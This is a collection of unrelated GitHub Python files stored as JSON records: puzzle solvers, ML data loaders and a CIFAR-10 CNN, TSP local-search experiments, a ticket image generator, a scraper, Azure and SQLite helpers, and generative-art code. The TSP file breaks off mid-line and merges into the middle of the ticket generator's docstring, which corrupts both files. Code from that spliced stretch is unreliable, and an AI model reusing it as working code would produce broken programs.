{"seq_id":"1977734928","text":"with open(\"aoc-7-1.txt\") as f:\n    content = f.readlines()\n\ncontent = [x.strip() for x in content]\nalphabet = set({})\nrules = []\n\nfor rule in content:\n    rules.append((rule[5], rule[36]))\n    alphabet.add(rule[5])\n    alphabet.add(rule[36])\n\nalphabet = list(alphabet)\nalphabet.sort()\n\nanswer_string = ''\nwhile len(rules) > 0:\n    for A in alphabet[:]:\n        cont = False\n        for rule in rules:\n            if rule[1] == A:\n                cont = True\n                break\n\n        if cont:\n            continue\n\n        answer_string = answer_string + A\n        alphabet.remove(A)\n        i = 0\n        while i < len(rules):\n            if rules[i][0] == A:\n                rules = rules[:i] + rules[i + 1:]\n            else:\n                i = i + 1\n        break\n    \n    \nprint(answer_string)\nprint(alphabet)\n","repo_name":"woodgern/AdventOfCode2018","sub_path":"aoc-7-1.py","file_name":"aoc-7-1.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"73819813286","text":"import pandas as pd\nimport os\nimport numpy as np\n\n# Create dummy csv files for training and validation set containing images and corresponding labels\n\ndata_path = \"data\"\n\nif \"train_patches.csv\" not in os.listdir(\"data\") and \"valid_patches.csv\" not in os.listdir(\"data\"):\n    # make a list of all images\n    img_list = os.listdir(data_path)\n    train_img_list = img_list[:8]\n    valid_img_list = img_list[8:]\n    for img_list, split in zip([train_img_list, valid_img_list], [\"train\", \"valid\"]):\n        # add placeholder labels for demo purposes\n        label_list = [0]*len(img_list)\n\n        patches = pd.DataFrame({\"imgs\":img_list, \"labels\":label_list})\n        csv_path = os.path.join(data_path, f\"{split}_patches.csv\")\n        patches.to_csv(csv_path, index=False)\nelse:\n    print(\"Training or validation csv files already created.\")","repo_name":"blazejdolicki/pytorch-templates","sub_path":"vision/create_data_filelist.py","file_name":"create_data_filelist.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"2324521657","text":"from typing import Tuple\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision.transforms import ToTensor\n\nclass FashionMNISTData:\n\n    def __init__(self) -> None:\n        train_data, test_data = self.__fetch_data()\n        batch_size = 64\n\n        self.train_dataloader = DataLoader(train_data, batch_size=batch_size)\n        self.test_dataloader = DataLoader(test_data, batch_size=batch_size)\n\n    def get_data(self) -> Tuple[object, object]:\n        return (self.train_dataloader, self.test_dataloader)\n    \n    def print_data_shape(self) -> None:\n        for X, y in 
self.test_dataloader:\n print(f\"Shape of X [N, C, H, W]: {X.shape}\")\n print(f\"Shape of y: {y.shape} {y.dtype}\\n\")\n break\n \n def __fetch_data(self) -> Tuple[object, object]:\n train_data = datasets.FashionMNIST(root='data',\n train=True,\n download=True,\n transform=ToTensor(),\n )\n test_data = datasets.FashionMNIST(root='data',\n train=False,\n download=True,\n transform=ToTensor(),\n )\n return (train_data, test_data)\n ","repo_name":"ccentrella/pytorch","sub_path":"model/FashionMNISTData.py","file_name":"FashionMNISTData.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12643256842","text":"from AOA_TSP_greedy import read_datas, compute_dis_mat, ramdom_start,compute_total_dist\nfrom AOA_TSP_greedy_VP import read_datas2, compute_dis_mat2, ramdom_start2\nfrom AOA_TSP_greedy import greedy as greedy1\nfrom AOA_TSP_greedy_VP import greedy2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport time\nimport openpyxl\nimport pandas as pd\nimport os\n\n#initial\ndef initial1():\n path = r\"Problem I-TSP_100Cities.xlsx\"\n location = read_datas(path) # 2 x num_city\n dist_mat = compute_dis_mat(location)\n length,start,order,_ = ramdom_start(location)\n return location, dist_mat,length,start,order\n\ndef initial2():\n filename = r\"Problem II-Virtual_TSP100Cities.xlsx\"\n location = read_datas2(r\"Problem I-TSP_100Cities.xlsx\")\n dist_mat = compute_dis_mat2(read_datas2(filename)) #different from 1\n length, start, order, _ = ramdom_start2(filename,location)\n return location, dist_mat, length, start, order\n\n\ndef TSP_plt(location,order):\n X_locations = [location[i][0] for i in order]\n Y_locations = [location[i][1] for i in order]\n\n plt.scatter(X_locations, Y_locations, color='b')\n plt.plot(X_locations, Y_locations, \"->\", color='g')\n plt.scatter(X_locations[0], Y_locations[0], color='r')\n plt.show()\n return\n\n\n\ndef get_edge_and_evaluate(order,dist_mat,length):\n get_new = False\n evaluate_iter = 0\n new_order = []\n length_change = 0\n new_order = order\n new_length = length\n while get_new == False:\n end1,end2 = random.sample(order,2)\n n_inverse = abs(end1-end2)\n if n_inverse ==1:\n continue\n\n evaluate_iter +=1\n if evaluate_iter > 6000:\n break\n\n\n x1=min(end1,end2)\n x2=max(end1,end2)\n\n edge1 = [x1-1,x1]\n edge2 = [x2,x2+1]\n if x1 == 0:\n edge1[0] = len(order)-1\n if x2 == len(order)-1:\n edge2[1]=0\n\n #edge1[0]-edge1[1]-edge2[0]-edge2[1] index in order[]\n #x10--x11--x20--x21\n x10,x11 = order[edge1[0]],order[edge1[1]]\n x20,x21 = order[edge2[0]],order[edge2[1]]\n length_minor = dist_mat[x10][x11] + dist_mat[x20][x21]\n length_add = dist_mat[x10][x20] + dist_mat[x11][x21]\n\n length_change = length_add - length_minor\n\n\n if length_change < 0:\n # revise i2--j1\n\n if edge1[1] == 0:\n list1=[]\n else:\n list1 = order[:edge1[1]]\n\n reverse_list = order[edge1[1]:edge2[0] + 1]\n reverse_list.reverse()\n\n if edge2[0] == 0:\n list3 =[]\n else:\n list3 = order[edge2[0]+1:]\n\n new_order = list1 + reverse_list + list3\n new_length = length+length_change\n get_new = True\n\n\n # else:\n # length_change=0\n # new_order = order\n # new_length = length\n\n return length_change, new_order, new_length, evaluate_iter\n\n\n\n\ndef pltshow(location,order,version):\n order = order + [order[0]]\n X_locations = [location[i][0] for i in order]\n Y_locations = [location[i][1] for i in order]\n\n plt.scatter(X_locations, Y_locations, color='b')\n 
plt.plot(X_locations, Y_locations, \"->\", color='g')\n plt.scatter(X_locations[0], Y_locations[0], color='r')\n plt.title(version)\n plt.show()\n\n\n\ndef local_search1(order,location, length,dist_mat,start_time):\n evaluate_total = 0\n for_stop = 0\n while evaluate_total < 100000:\n evaluate_total +=1\n\n evaluate_result = get_edge_and_evaluate(order,dist_mat,length)\n\n if evaluate_result is not None:\n length_change,new_order, new_length, evaluate_iter = evaluate_result\n\n evaluate_total += evaluate_iter\n # print(\"length_change\", new_length-length)\n # print(\"evaluate_time\", evaluate_total)\n # print(\"time is \", time.time() - start_time)\n print(\"cureent_compute\", evaluate_total)\n print(\"current_best_length\", new_length)\n print(\"best_order\", new_order)\n\n if new_length - length ==0:\n for_stop += 1\n if for_stop >3:\n break\n\n # pltshow(location, order)\n\n else:\n new_order = order\n new_length = length\n\n order = new_order\n length = new_length\n\n compute_time = time.time()-start_time\n # pltshow(location, order,version)\n\n print(\"No better tour is obtained by local search\")\n\n return order, length, evaluate_total,compute_time\n\ndef list2str(input):\n \"\"\"\n input: 1xm list or np.array\n output: str item0——>item1——> ...——>item -1\n \"\"\"\n input = list(input)\n input = [str(i) for i in input]\n output = \" \".join(input)\n return output\n\ndef str2list(input):\n\n # input = str.replace(input,\"——>\",\",\")\n input = input.split(\" \")\n output = [int(i) for i in input]\n # output = np.array(input)\n return output\n\n\ndef save_csv(save_name,version:str,data,names=None,mode=\"w\",header=False):\n # import pdb\n # pdb.set_trace()\n\n if names is None:\n names=[\"version\",\"length\",\"tour\",\"single_compute\",\"single_time\",\"total_compute\",\"total_time\"]\n else:\n names = names\n csv_data = []\n data.insert(0,version)\n csv_data.append(data)\n csv_pd = pd.DataFrame(csv_data,columns=names)\n csv_pd.to_csv(save_name,sep=',',mode=mode, header=header,index=False)\n\ndef LocalSearch_MultiIntial(filename,save_name,n=100,problem=1):\n evaluate_total = 0\n compute_time = 0\n for i in range(n):\n start = i\n\n if problem == 1:\n location = read_datas(filename)\n dist_mat = compute_dis_mat(location)\n init_length,init_order, = greedy1(start,location)\n else:\n location = read_datas2(filename)\n dist_mat = compute_dis_mat2(location)\n init_length,init_order = greedy2(start,filename)\n\n init_order.pop()\n start_time = time.time()\n order, length, evaluate_single,single_time = local_search1(init_order, location, init_length, dist_mat, start_time)\n version = \"Problem{}\".format(problem)+ \"_start_from_city{}\".format(start)\n tour = list2str(order)\n evaluate_total += evaluate_single\n compute_time += single_time\n data = [length,tour,evaluate_single,single_time,evaluate_total,compute_time]\n save_csv(save_name,version, data, mode='a')\n\n file_location = r\"Problem I-TSP_100Cities.xlsx\"\n plt_location =read_datas(file_location)\n pltshow(plt_location, order,version+\"with_length_\"+str(length))\n\ndef greedy_initial(filename,save_name,n=100,problem=1):\n for i in range(n):\n start = i\n\n if problem == 1:\n location = read_datas(filename)\n # dist_mat = compute_dis_mat(location)\n init_length, init_order, = greedy1(start, location)\n else:\n location = read_datas2(filename)\n # dist_mat = compute_dis_mat2(location)\n init_length, init_order = greedy2(start, filename)\n\n init_order.pop()\n version = \"Problem{}\".format(problem) + 
\"_start_from_city{}\".format(start)\n tour = list2str(init_order)\n data = [init_length, tour]\n names=[\"version\",\"length\",'tour']\n save_csv(save_name, version, data=data, names=names , mode='a')\n\ndef save_initials_from_greedy(problem=1):\n filename1 = r\"Problem I-TSP_100Cities.xlsx\"\n filename2 = r\"Problem II-Virtual_TSP100Cities.xlsx\"\n\n save_name1 = \"greedy_initial_1.csv\"\n save_name2 = \"greedy_initial_2.csv\"\n greedy_initial(filename1, save_name1, n=100, problem=1)\n greedy_initial(filename2, save_name2, n=100, problem=2)\n\n\n\ndef experiment_1():\n \"\"\"\n strat from all cities to obtain 100 initial tours,\n then run local search for each initial solution\n \"\"\"\n filename1 = r\"Problem I-TSP_100Cities.xlsx\"\n filename2 = r\"Problem II-Virtual_TSP100Cities.xlsx\"\n\n # LocalSearch_MultiIntial(filename1, n=100, problem=1)\n save_name = \"good_results_problem1_try3.csv\"\n LocalSearch_MultiIntial(filename1, save_name, n=100, problem=1)\n\ndef experiment_2(i=1,problem=1):\n \"\"\"\n strat from all cities and select 20% best solutions as initial solutions.\n then run local search for each initial solution\n \"\"\"\n\n filename1 = r\"Problem I-TSP_100Cities.xlsx\"\n filename2 = r\"Problem II-Virtual_TSP100Cities.xlsx\"\n initial_file1 = \"greedy1_initial_20.csv\"\n initial_file2 = \"greedy2_initial_20.csv\"\n location =read_datas(filename1)\n\n\n if problem == 1:\n initial_file = initial_file1\n dist_mat = compute_dis_mat(read_datas(filename1))\n else:\n initial_file = initial_file2\n dist_mat = compute_dis_mat2(read_datas2(filename2))\n\n initial_solutions = pd.DataFrame(pd.read_csv(initial_file, header=None))\n evaluate_total = 0\n compute_time = 0\n lengths = dict()\n lengths[\"samll_lengthes\"] = []\n lengths[\"save_names\"] = []\n smallest_length = np.inf\n small_name=None\n for data in initial_solutions.values:\n version, init_length, tour = data\n init_order = str2list(tour)\n init_length = float(init_length)\n\n start_time = time.time()\n order, length, evaluate_single,single_time = local_search1(init_order, location, init_length, dist_mat, start_time)\n evaluate_total += evaluate_single\n compute_time += single_time\n\n order.pop()\n tour = list2str(order)\n data = [length, tour, evaluate_single,single_time,evaluate_total,compute_time]\n names=[\"version\",\"length\",\"tour\",\"single_compute\",\"single_time\",\"total_compute\",\"total_time\"]\n\n save_name = \"problem{}\".format(problem)+\"_20initial_try{}\".format(i)+\".csv\"\n save_name = os.path.join(\"result3\",save_name)\n save_csv(save_name=save_name,version=version, data=data, names=names, mode='a')\n\n if length dd/mm/yy hh:mm:ss\n \n price (float, optional): ticket price. Defaults to None.\n seat (str, optional): seat number. Defaults to None.\n location (str, optional): event location. Defaults to None.\n wallet (str, optional): wallet id. 
Defaults to None.\n        \"\"\"\n        \n        # Ticket\n        self.id = id\n        self.url = url # qr code url\n        self.price = price\n        self.picture = picture # picture\n        self.seat = seat\n        \n        # Event\n        self.title = str(title).upper() # main title\n        self.subtitle = str(subtitle).upper() # sub title\n        self.location = location\n\n        formatted_date = datetime.strptime(date, '%d/%m/%Y %H:%M:%S')\n        self.day = formatted_date.strftime('%b %d %Y')\n        self.hour = formatted_date.strftime('%I:%M%p')\n        self.date = date # date\n        self.wallet = wallet\n\n    def generate_picture(self):\n        \"\"\"generate ticket\n\n        Returns:\n            image at png format\n        \"\"\"\n        # Creating an instance of qrcode\n        qr_code = QrCodeGenerator.generateQrCode(self.url).img\n        qr_code = qr_code.resize((360, 360))\n\n        # Background image\n        background = Image.open('./ressources/template/background.png', 'r').convert('RGB') #Opens Template Image\n        \n        # Special picture\n        special_picture = Image.open(self.picture,'r').convert('RGB')\n        special_picture = special_picture.resize((630, 630))\n\n        # Add special picture on the background \n        background.paste(qr_code, (100, 238))\n        background.paste(special_picture, (1947, 120))\n\n        def addNewDraw(text: str, x_pos: str, y_pos: str, fontsize: str, fontcolor: tuple, fontwidth: int = 1):\n            \"\"\"Add text on the picture\n\n            Args:\n                text (str): the text added on the picture\n                x_pos (str): text x position\n                y_pos (str): text y position\n                fontsize (str): text fontsize\n                fontcolor (tuple): text fontcolor (r, g, b)\n                fontwidth (int, optional): text fontwidth. Defaults to 1.\n            \"\"\"\n            draw = ImageDraw.Draw(background)\n            myFont = ImageFont.truetype(\"./ressources/courrier_new.ttf\", fontsize)\n            w, h = draw.textsize(text, font = myFont)\n            draw.text((x_pos - (w/2), y_pos - (h/2)), text, font= myFont, stroke_width=fontwidth, fill=fontcolor)\n\n        # Initialize color\n        blue_color = (30, 61, 89)\n        orange_color = (255, 193, 59)\n        \n        # Display title\n        addNewDraw(self.title, 1220, 320, 120, blue_color, 3)\n        \n        # Display subtitle\n        addNewDraw(self.subtitle, 1220, 500, 90, blue_color, 3)\n        \n        # Display day\n        addNewDraw(self.day, 280, 190, 50, orange_color, 1)\n        \n        # Display hour\n        addNewDraw(self.hour, 280, 635, 50, orange_color, 1)\n\n        # Display no refund\n        _text = \"No refund / No exchange\"\n        addNewDraw(_text, 815, 815, 38, (245, 240, 225))\n        \n        # Display ID\n        addNewDraw(\"N°\" + str(self.id), 280, 50, 25, orange_color, 1)\n        \n        # Display seat\n        addNewDraw(\"Seat N°\" + str(self.seat), 280, 800, 30, orange_color, 1)\n        \n        return background\n\n\n    # Create JSON\n    def generate_json(self): \n        data = {}\n        data['event_date'] = self.date\n        data['event_location'] = self.location\n        data['event_title'] = self.title.lower()\n        data['event_subtitle'] = self.subtitle.lower()\n        \n        data['ticket_seat'] = self.seat\n        data['ticket_price'] = self.price\n        data['ticket_id'] = self.id\n        data['wallet'] = self.wallet\n        \n        return json.dumps(data)","repo_name":"Dimitri-Prieur/NFT-project","sub_path":"package/ticket_generator.py","file_name":"ticket_generator.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"40736702147","text":"#!/usr/bin/env python3\nimport re, datetime\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup as BS\n\ndef simple_get(url):\n    \"\"\"\n    Attempts to get the content at `url` by making an HTTP GET request.\n    If the content-type of response is some kind of HTML/XML, return 
the\n text content, otherwise return None.\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n\n except RequestException as e:\n log_error('Error during requests to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\ndef log_error(e):\n \"\"\"\n It is always a good idea to log errors.\n This function just prints them, but you can\n make it do anything.\n \"\"\"\n print(e)\n\ndef main():\n print('begin')\n raw_html = simple_get('http://uscode.house.gov/download/download.shtml')\n html = BS(raw_html, 'html.parser')\n # print(html)\n updated = html.find('h3').text\n download = ''\n for a in html.find_all('a'):\n if a.text == '[XHTML]':\n download = a\n print(updated)\n print(download.text)\n # for h in html.find('h3'):\n # if h['class'] == 'releasepointinformation':\n # print(h.text)\n release = re.search(r'\\d{3}-\\d{3}', updated).group()\n print(release)\n\nif __name__=='__main__':\n main()\n","repo_name":"samlehman617/legal-vcs","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18770662579","text":"import os\nimport subprocess\n\n\nclass AzureStorage:\n\n\tdef __init__ (self, container, *,\n\t\taccount_name,\n\t\tsas_token\n\t):\n\t\tself._container = container\n\t\tself._account = account_name\n\t\tself._sas_token = sas_token\n\n\tdef upload (self, filename, blobname):\n\t\tsubprocess.run([ 'az', 'storage', 'blob', 'upload',\n\t\t\t'--container', self._container,\n\t\t\t'--file', filename,\n\t\t\t'--name', blobname\n\t\t],\n\t\t\tcapture_output = True,\n\t\t\tenv = {\n\t\t\t\t**os.environ,\n\t\t\t\t'AZURE_STORAGE_ACCOUNT': self._account,\n\t\t\t\t'AZURE_STORAGE_SAS_TOKEN': self._sas_token\n\t\t\t}\n\t\t)\n","repo_name":"bartan0/azure-debrepo","sub_path":"azure_debrepo/azure_storage.py","file_name":"azure_storage.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"528341408","text":"import sqlite3\nimport query as q\n\n\ndef row_factory(cursor, row):\n d = {}\n for i, col in enumerate(cursor.description):\n d[col[0]] = row[i]\n return d\n\n\ndef execute(table: str, data: dict) -> dict:\n\n response = {\n 'status': 'Ok',\n 'data': [],\n 'affectedRows': -1,\n 'insertId': 0\n }\n\n try:\n if 'action' not in data:\n raise Exception(\n 'An action has to be specified (insert|update|select|delete)'\n )\n\n action = data['action']\n cond = data['cond'] if 'cond' in data else {}\n order = data['order'] if 'order' in data else {}\n limit = data['limit'] if 'limit' in data else False\n offset = data['offset'] if 'offset' in data else 0\n page = (limit, offset) if limit is not False else False\n\n if 'data' not in data and action != 'delete':\n raise Exception('data field is required for this operation')\n\n fields = data['data'] if 'data' in data else {}\n\n if action == 'insert':\n query, values = q.insert(table, fields)\n elif action == 'update':\n query, values = q.update(table, fields, cond)\n elif action == 'select':\n query, values = q.select(table, fields, cond, order, page)\n elif action == 
'delete':\n query, values = q.delete(table, cond)\n else:\n raise Exception(f'Unknown action {action}')\n\n conn = sqlite3.connect('data.db')\n conn.row_factory = row_factory\n c = conn.cursor()\n\n resp = c.execute(query, values)\n response['data'] = resp.fetchall()\n response['affectedRows'] = c.rowcount\n response['insertId'] = c.lastrowid\n\n conn.commit()\n conn.close()\n except BaseException as e:\n response['status'] = e.args[0]\n\n return response\n\n\nif __name__ == \"__main__\":\n import sys\n import json\n\n jsoninput = \"\".join(list(sys.stdin))\n data = json.loads(jsoninput)\n response = execute('people', data)\n jsonoutput = json.dumps(response)\n\n print(jsonoutput)\n","repo_name":"hbarrocas/miniserve","sub_path":"server/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4334244956","text":"\nimport csv\nimport jsonlines\nimport os\n\n\n\nclass JsonLineParser():\n write_file = open(\"method_data.csv\", 'a')\n csvwriter = csv.writer(write_file)\n csvwriter.writerow(['IMEI', 'COUNT'])\n list_of_imeis = []\n\n @classmethod\n def tearDownClass(cls):\n cls.write_file.close()\n\n @classmethod\n def directory_iterator(cls, file_path):\n \"\"\"\n :param file_path: Parent Directory where all the folders are\n :return:\n \"\"\"\n\n # Iterate through directory\n for folder in os.listdir(file_path):\n if folder != '.DS_Store':\n for subfolder in os.listdir(file_path + \"/\" + folder):\n if subfolder != '.DS_Store':\n for startdayfolder in os.listdir(file_path + \"/\" + folder + \"/\" + subfolder):\n if startdayfolder != '.DS_Store':\n for file in os.listdir(file_path + \"/\" + folder + \"/\" + subfolder + \"/\" + startdayfolder):\n cls.file_parser(file_path + \"/\" + folder + \"/\" + subfolder + \"/\" + startdayfolder + \"/\" + file)\n\n\n cls.print_csv(cls.list_of_imeis)\n\n\n @classmethod\n def file_parser(cls, path):\n \"\"\"\n :param path: input json file\n :return:\n \"\"\"\n input = path\n with jsonlines.open(input) as reader:\n # Iterate through json lines - compile list of offending IMEIs into one list\n for obj in reader:\n sensorAnomalies = obj[\"sensorAnomalies\"]\n\n for i in range(len(sensorAnomalies)):\n if len(sensorAnomalies[i][\"repeatingRpmAndSpeed\"]) != 0:\n temp_imei = obj['imei']\n # if temp_imei not in cls.list_of_imeis:\n cls.list_of_imeis.append(temp_imei)\n\n\n\n @classmethod\n def print_csv(cls, imeis):\n distinct = []\n for i in imeis:\n if i not in distinct:\n distinct.append(i)\n counter = cls.list_of_imeis.count(i)\n cls.csvwriter.writerow([i, counter])\n\n\n\n","repo_name":"fionasudihok/data_refine","sub_path":"data_parser.py","file_name":"data_parser.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10894834758","text":"from numpy.core.shape_base import block\nimport vsketch\nfrom shapely import geometry, affinity\nimport numpy as np\nimport random\nimport os\n\n# future ideas:\n# windows, doors, chimneys\n# perspective positioning/composition\n# curved parts\n\nnp.set_printoptions(suppress=True)\n\nclass Tower():\n \n def __init__(self, vsk, other) -> None:\n \n self.o = other\n \n self.vsk = vsk\n \n self.pos = np.array([[0,0]])\n\n \n self.block_types = np.array([\n [\"straight\", self.o.block_straight],\n [\"diagonal_in\", self.o.block_diagonal_in],\n [\"diagonal_out\", self.o.block_diagonal_out],\n 
[\"random_angle\", self.o.block_random_angle]\n ], dtype=object)\n \n\n\n def add_block(self):\n vsk = self.vsk\n \n block_type = random.choices(self.block_types[:,0], weights=self.block_types[:,1])[0]\n \n if block_type == \"straight\":\n self.pos = np.append(self.pos, \n [[self.pos[-1,0],\n self.pos[-1,1] -(vsk.random(self.o.block_height_rand) +self.o.block_height_min)]],\n axis=0)\n \n if block_type == \"diagonal_in\":\n displace = vsk.random(self.o.block_height_rand) + self.o.block_height_min\n self.pos = np.append(self.pos, \n [[self.pos[-1,0] + displace,\n self.pos[-1,1] - displace]],\n axis=0)\n \n if block_type == \"diagonal_out\":\n displace = vsk.random(self.o.block_height_rand) + self.o.block_height_min\n self.pos = np.append(self.pos, \n [[self.pos[-1,0] - displace,\n self.pos[-1,1] - displace]],\n axis=0)\n \n if block_type == \"random_angle\":\n self.pos = np.append(self.pos, \n [[self.pos[-1,0] +vsk.random(self.o.block_angle_x_rand) +self.o.block_angle_x_min,\n self.pos[-1,1] -(vsk.random(self.o.block_height_rand) +self.o.block_height_min)]],\n axis=0)\n \n def add_top(self):\n vsk = self.vsk\n \n self.pos = np.append(\n self.pos, [[max(self.pos[:,0]) + vsk.random(self.o.top_w_rand) + self.o.top_w_min,\n self.pos[-1,1] - (vsk.random(self.o.top_h_rand) + self.o.top_h_min)]], axis=0)\n \n\n def draw_tower(self):\n vsk = self.vsk\n \n # vsk.geometry(geometry.LineString(self.pos))\n \n for i in range(self.o.line_count):\n \n scale = np.cos((np.pi/(self.o.line_count-1)) * i)\n \n scaled = affinity.scale(geometry.LineString(self.pos), scale)\n translated = affinity.translate(scaled, (max(self.pos[:,0]) - min(self.pos[:,0])) /2 * (1 - scale))\n centered = affinity.translate(translated, -(max(self.pos[:,0]) - min(self.pos[:,0])))\n \n vsk.geometry(centered)\n\n\nclass Day09ArchitectureSketch(vsketch.SketchClass):\n \n line_count = vsketch.Param(20)\n \n block_straight = vsketch.Param(5)\n block_diagonal_in = vsketch.Param(4)\n block_diagonal_out = vsketch.Param(4)\n block_random_angle = vsketch.Param(2)\n \n block_height_min = vsketch.Param(5)\n block_height_rand = vsketch.Param(2)\n \n block_angle_x_min = vsketch.Param(-3.5)\n block_angle_x_rand = vsketch.Param(7)\n \n block_count_min = vsketch.Param(10)\n block_count_max = vsketch.Param(15)\n \n top_h_min = vsketch.Param(5)\n top_h_rand = vsketch.Param(5)\n \n top_w_min = vsketch.Param(5)\n top_w_rand = vsketch.Param(5)\n\n\n def draw(self, vsk: vsketch.Vsketch) -> None:\n vsk.size(\"205mmx130mm\", landscape=False)\n vsk.scale(\"mm\")\n \n vsk.line(-19,0,178,0)\n \n for x in range(5):\n \n t = Tower(vsk, self)\n for i in range(int(vsk.random(self.block_count_min, self.block_count_max))):\n t.add_block()\n t.add_top()\n t.draw_tower()\n vsk.translate(39,0)\n\n # implement your sketch here\n # vsk.circle(0, 0, self.radius, mode=\"radius\")\n\n def finalize(self, vsk: vsketch.Vsketch) -> None:\n filename = os.path.basename(__file__)[7:-3]\n vsk.vpype(f\"rotate 180 linemerge linesimplify reloop linesort gwrite {filename}.gcode\")\n\n\nif __name__ == \"__main__\":\n Day09ArchitectureSketch.display()\n","repo_name":"hapiel/Genuary-2022","sub_path":"day09_architecture/sketch_day09_architecture.py","file_name":"sketch_day09_architecture.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"26604219563","text":"\"\"\"Setup logging environment\"\"\"\nimport logging\nimport logging.config\nimport re\n\n\nclass 
SecretWordFilter(logging.Filter):\n def __init__(self, param=None):\n self.param = param\n\n def filter(self, record):\n msg = str(record.msg)\n for x in self.param:\n if x in msg.lower():\n word_finder = re.compile(rf\"({x}':) (\\S+)'\", re.DOTALL | re.IGNORECASE)\n record.msg = re.sub(word_finder, r\"\\1 #redacted#\", msg)\n return True\n\n\nLOGGING = {\n \"version\": 1,\n \"formatters\": {\n \"detailed\": {\n \"class\": \"logging.Formatter\",\n \"format\": \"%(asctime)s %(name)-1s:%(levelname)-8s %(message)s\",\n }\n },\n \"filters\": {\n \"myfilter\": {\n \"()\": SecretWordFilter,\n \"param\": [\"password\", \"secret\", \"connurl\"],\n }\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"filters\": [\"myfilter\"],\n \"formatter\": \"detailed\",\n }\n },\n \"root\": {\"level\": \"INFO\", \"handlers\": [\"console\"]},\n}\n\nlogging.config.dictConfig(LOGGING)\n# Setting the threshold of py4j.java_gateway to WARNING\n# To avoid spam in databricks logs\nlogging.getLogger(\"py4j.java_gateway\").setLevel(logging.WARNING)\n\n\ndef get_logger(name):\n return logging.getLogger(name)\n","repo_name":"husqvarnagroup/GETL","sub_path":"getl/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"10702217307","text":"from keras.datasets import cifar10\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense,Activation,Dropout,Flatten\nfrom keras.layers.convolutional import Conv2D,MaxPooling2D\nfrom keras.optimizers import RMSprop,SGD,Adam\nimport matplotlib.pyplot as plt\n\n#CIFAR 10 has 60k imgages, 32x32 and RGB\n\nIMG_CHANNELS=3\nIMG_ROWS=32\nIMG_COLUMNS=32\n\n#constants\n\nBATCH = 128\nepoch=20\nclasses=10\nverbose=1\nvalidation=0.2\noptimiser=RMSprop()\n\n#LoadDataset\n\n(X_train,Y_train),(X_test,Y_test)=cifar10.load_data()\nprint(\"X_train size \",X_train.shape[0])\nprint(\"X_test size: \",X_test.shape[0])\n# print(\"No of features: \",Y_train.shape[1])\n\n#One hot encode\n\nY_train=np_utils.to_categorical(Y_train,classes)\nY_test=np_utils.to_categorical(Y_test,classes)\n\n# print(\"The class labels: \",Y_train[0])\n\n#Normalise the data\nX_train=X_train.astype('float32')\nX_test=X_test.astype('float32')\nX_train/=255\nX_test/=255\n\n#Creating the neural network\nmodel=Sequential()\nmodel.add(Conv2D(32,(3,3),strides=1,padding='same',input_shape=(IMG_ROWS,IMG_COLUMNS,IMG_CHANNELS)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(classes))\nmodel.add(Activation('softmax'))\nmodel.summary()\n\n#training the model\n\nmodel.compile(loss='categorical_crossentropy',optimizer=optimiser,metrics=['accuracy'])\nmodel.fit(X_train,Y_train,batch_size=BATCH,epochs=epoch,validation_split=validation,verbose=1)\nscore=model.evaluate(X_test,Y_test,batch_size=BATCH,verbose=0)\n# print(\"Test accuracy: \",score[1])\n\nimport numpy as np\nimport cv2\n\nimgs=cv2.imread('dog.jpg')\nimgs=cv2.resize(imgs,(32,32))\n\n# 
